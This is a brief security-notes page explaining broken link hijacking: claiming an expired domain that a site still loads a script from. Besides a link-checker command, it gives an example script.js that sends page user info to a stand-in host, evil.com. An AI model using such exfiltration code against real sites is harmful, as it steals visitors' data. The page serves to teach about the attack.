# Broken Links Hijacking

### Tools

```bash
# https://github.com/stevenvachon/broken-link-checker 
blc -rfoi --exclude linkedin.com --exclude youtube.com --filter-level 3 https://example.com/

```

## Broken Link Hijacking <a href="#broken-link-hijacking" id="broken-link-hijacking"></a>

Broken Link Hijacking is an attack method that attacker can execute arbitrary code by hijacking link e.g. JavaScript file if target website is loading file with broken link.

### Investigation <a href="#investigation" id="investigation"></a>

Assume that target website loads external JavaScript file in `example.com` no longer exists as below.

```shellscript
<script src="//example.com/script.js"></script>
```

If attacker bought this domain, he can host arbitrary JavaScript file named **`script.js`** in the `example.com` root directory.

### Exploitation Examples <a href="#exploitation-examples" id="exploitation-examples"></a>

Attacker can write arbitrary code for compromising users in **`script.js`** as example above.\
For example, if target website includes sensitive information of authenticated user in the page where the broken link is loaded, attackers can send these information to their owned server.

```shellscript
// script.js
var secret = document.getElementById('userinfo');
var request = new XMLHttpRequest();
request.open('GET', 'http://evil.com/?data=' + secret, false);
request.send();
```

### References <a href="#references" id="references"></a>

* [EdOverflow](https://edoverflow.com/2017/broken-link-hijacking/)

<br>